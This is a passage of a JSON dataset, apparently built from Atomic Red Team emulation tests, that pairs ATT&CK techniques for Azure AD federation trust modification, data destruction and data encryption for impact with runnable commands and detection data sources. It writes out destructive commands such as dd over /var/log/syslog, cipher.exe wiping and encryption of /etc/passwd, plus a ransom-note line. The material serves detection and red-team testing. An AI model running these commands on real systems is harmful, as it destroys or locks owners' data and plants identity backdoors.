-ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"https://sts.contoso.com/adfs/services/trust/mex\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"contoso.com\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"contoso.com\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1484.002", + "display_name": "Domain Trust Modification", + "atomic_tests": [ + { + "name": "Add Federation to Azure AD", + "auto_generated_guid": "8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7", + "description": "Add a new federation to Azure AD using PowerShell. The malicious Identity Provider to be added must be configured beforehand.\nIf ADFS is used as IdP, the Uris parameters can be found at 'https://..com/federationmetadata/2007-06/federationmetadata.xml'\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "azure_username": { + "description": "Username of a privileged Azure AD account such as External Identity Provider Administrator or Global Administrator roles", + "type": "String", + "default": "bruce.wayne@contosocloud.com" + }, + "azure_password": { + "description": "Password of azure_username", + "type": "String", + "default": "iamthebatman" + }, + "active_logon_uri": { + "description": "Active Logon Uri, available in federation metadata at field if ADFS is used.", + "type": "String", + "default": "https://sts.contoso.com/adfs/ls/" + }, + "issuer_uri": { + "description": "Issuer Uri, available in federation metadata at the \"entityID\" field if ADFS is used.", + "type": "String", + "default": "http://sts.contoso.com/adfs/services/trust" + }, + "metadata_uri": { + "description": "Metadata exchange Uri, available in federation metadata at
field if ADFS is used.", + "type": "String", + "default": "https://sts.contoso.com/adfs/services/trust/mex" + }, + "public_key": { + "description": "Public key of the X509 signing token certificate, in base64", + "type": "String", + "default": "MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=" + }, + "domain_name": { + "description": "New federation domain name", + "type": "String", + "default": "contoso.com" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AzureADPreview Powershell module must be installed. The Identity Provider to be federated must be configured (outside of the scope of this test).\n", + "prereq_command": "if (Get-Module AzureADPreview) {exit 0} else {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureADPreview -Force\n" + } + ], + "executor": { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "cleanup_command": "try {\nImport-Module AzureADPreview -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\nRemove-AzureADExternalFederationDomain -ExternalDomainName \"#{domain_name}\"\n} catch {}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object creation", + "description": "An active directory object was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1485", + "command_list": [ + "if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }\nInvoke-Expression -Command \"$env:TEMP\\Sdelete\\sdelete.exe -accepteula #{file_to_delete}\"\n", + "if (-not (Test-Path $env:TEMP\\T1485.txt)) { New-Item $env:TEMP\\T1485.txt -Force }\nInvoke-Expression -Command \"#{sdelete_exe} -accepteula $env:TEMP\\T1485.txt\"\n", + "dd of=#{file_to_overwrite} if=/dev/zero count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes\n", + "dd of=/var/log/syslog if=#{overwrite_source} count=$(ls -l /var/log/syslog | awk '{print $5}') iflag=count_bytes\n", + "cipher.exe /w:C:\n" + ], + "commands": [ + { + "command": "if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }\nInvoke-Expression -Command \"$env:TEMP\\Sdelete\\sdelete.exe -accepteula #{file_to_delete}\"\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + }, + { + "command": "if (-not (Test-Path $env:TEMP\\T1485.txt)) { New-Item $env:TEMP\\T1485.txt -Force }\nInvoke-Expression -Command \"#{sdelete_exe} -accepteula $env:TEMP\\T1485.txt\"\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + }, + { + "command": "dd of=#{file_to_overwrite} if=/dev/zero count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + }, + { + "command": "dd of=/var/log/syslog if=#{overwrite_source} count=$(ls -l /var/log/syslog | awk '{print $5}') iflag=count_bytes\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + }, + { + "command": "cipher.exe /w:C:\n", + "source": "atomics/T1485/T1485.yaml", + "name": "Atomic Red Team Test - Data Destruction" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1485", + "display_name": "Data Destruction", + "atomic_tests": [ + { + "name": "Windows - Overwrite file with Sysinternals SDelete", + "auto_generated_guid": "476419b5-aebf-4366-a131-ae3e8dae5fc2", + "description": "Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, \"Files deleted: 1\" will be displayed in\nthe powershell session along with other information about the file that was deleted.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "sdelete_exe": { + "description": "Path of sdelete executable", + "type": "Path", + "default": "$env:TEMP\\Sdelete\\sdelete.exe" + }, + "file_to_delete": { + "description": "Path of file to delete", + "type": "Path", + "default": "$env:TEMP\\T1485.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})\n", + "prereq_command": "if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/SDelete.zip\" -OutFile \"$env:TEMP\\SDelete.zip\"\nExpand-Archive $env:TEMP\\SDelete.zip $env:TEMP\\Sdelete -Force\nRemove-Item $env:TEMP\\SDelete.zip -Force\n" + } + ], + "executor": { + "command": "if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }\nInvoke-Expression -Command \"#{sdelete_exe} -accepteula #{file_to_delete}\"\n", + "name": "powershell" + } + }, + { + "name": "macOS/Linux - Overwrite file with DD", + "auto_generated_guid": "38deee99-fd65-4031-bec8-bfa4f9f26146", + "description": "Overwrites and deletes a file using DD.\nTo stop the test, break the command with CTRL/CMD+C.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "overwrite_source": { + "description": "Path of data source to overwrite with", + "type": "Path", + "default": "/dev/zero" + }, + "file_to_overwrite": { + "description": "Path of file to overwrite and remove", + "type": "Path", + "default": "/var/log/syslog" + } + }, + "executor": { + "command": "dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes\n", + "name": "bash" + } + }, + { + "name": "Overwrite deleted data on C drive", + "auto_generated_guid": "321fd25e-0007-417f-adec-33232252be19", + "description": "RansomEXX malware removes all deleted files using windows built-in cipher.exe to prevent forensic recover.\nThis process is very slow and test execution may timeout. \nhttps://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware\nhttps://support.microsoft.com/en-us/topic/cipher-exe-security-tool-for-the-encrypting-file-system-56c85edd-85cf-ac07-f2f7-ca2d35dab7e4\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "cipher.exe /w:C:\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image deletion", + "description": "An image was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "image" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance deletion", + "description": "An instance was deleted.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "instance" + }, + { + "data_source": "snapshot", + "definition": "Information associated with the state of a system at a particular point in time.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "snapshot deletion", + "description": "A snapshot was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "snapshot" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage deletion", + "description": "A cloud storage was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "cloud storage bucket" + }, + { + "data_source": "cloud storage", + "definition": "Information associated with data object storage provided by a cloud vendor.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "cloud storage deletion", + "description": "A cloud storage was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "cloud storage object" + }, + { + "data_source": "volume", + "definition": "Information associated with accessible storage areas with a single file system.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "Windows", + "Linux", + "macOS" + ], + "data_component": "volume deletion", + "description": "A volume was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "volume" + } + ], + "external_reference": [ + "https://content.fireeye.com/apt/rpt-apt38", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + ], + [ + "https://aws.amazon.com/s3/", + "https://azure.microsoft.com/en-us/services/storage/blobs/", + "https://cloud.google.com/storage" + ] + ] + }, + { + "technique_id": "T1486", + "command_list": [ + "echo \"passwd\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}\n", + "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o /tmp/passwd.gpg -c #{input_file_path}\n", + "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c /etc/passwd\n", + "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo AES-256 -o #{encrypted_file_path} -c #{input_file_path}\n", + "$which_7z a -ppasswd #{encrypted_file_path} #{input_file_path}\n", + "$which_7z a -p#{pwd_for_encrypted_file} /tmp/passwd.zip #{input_file_path}\n", + "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} /etc/passwd\n", + "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "if [[ $USER == \"root\" ]]; then $which_ccencrypt /etc/passwd; file /etc/passwd.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt ~/.bash_history; file ~/.bash_history.cpt; #{impact_command}; fi\n", + "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; sudo su; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; sudo su; fi\n", + "$which_openssl genrsa -out /tmp/key.pem #{encryption_bit_size}\n$which_openssl rsa -in /tmp/key.pem -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out /tmp/pub.pem\n$which_openssl rsautl -encrypt -inkey /tmp/pub.pem -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + null, + "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out /tmp/passwd.zip\n", + "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in /etc/passwd -out #{encrypted_file_path}\n", + "echo T1486 - Purelocker Ransom Note > %USERPROFILE%\\Desktop\\YOUR_FILES.txt\n" + ], + "commands": [ + { + "command": "echo \"passwd\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o /tmp/passwd.gpg -c #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c /etc/passwd\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo AES-256 -o #{encrypted_file_path} -c #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_7z a -ppasswd #{encrypted_file_path} #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_7z a -p#{pwd_for_encrypted_file} /tmp/passwd.zip #{input_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} /etc/passwd\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt /etc/passwd; file /etc/passwd.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt ~/.bash_history; file ~/.bash_history.cpt; #{impact_command}; fi\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "if [[ $USER == \"root\" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; sudo su; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; sudo su; fi\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_openssl genrsa -out /tmp/key.pem #{encryption_bit_size}\n$which_openssl rsa -in /tmp/key.pem -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out /tmp/pub.pem\n$which_openssl rsautl -encrypt -inkey /tmp/pub.pem -pubin -in #{input_file_path} -out #{encrypted_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": null, + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out /tmp/passwd.zip\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}\n$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}\n$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in /etc/passwd -out #{encrypted_file_path}\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + }, + { + "command": "echo T1486 - Purelocker Ransom Note > %USERPROFILE%\\Desktop\\YOUR_FILES.txt\n", + "source": "atomics/T1486/T1486.yaml", + "name": "Atomic Red Team Test - Data Encrypted for Impact" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1486", + "display_name": "Data Encrypted for Impact", + "atomic_tests": [ + { + "name": "Encrypt files using gpg (Linux)", + "auto_generated_guid": "7b8ce084-3922-4618-8d22-95f996173765", + "description": "Uses gpg to encrypt a file\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "pwd_for_encrypted_file": { + "description": "the password that you want for the encrypted file", + "type": "String", + "default": "passwd" + }, + "encrypted_file_path": { + "description": "path to the encrypted file", + "type": "Path", + "default": "/tmp/passwd.gpg" + }, + "input_file_path": { + "description": "path to the file that you want to encrypt", + "type": "Path", + "default": "/etc/passwd" + }, + "encryption_alg": { + "description": "encryption algorithm of the file", + "type": "String", + "default": "AES-256" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Finds where gpg is located\n", + "prereq_command": "which_gpg=`which gpg`\n", + "get_prereq_command": "(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "echo \"#{pwd_for_encrypted_file}\" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}\n", + "cleanup_command": "rm #{encrypted_file_path}\n" + } + }, + { + 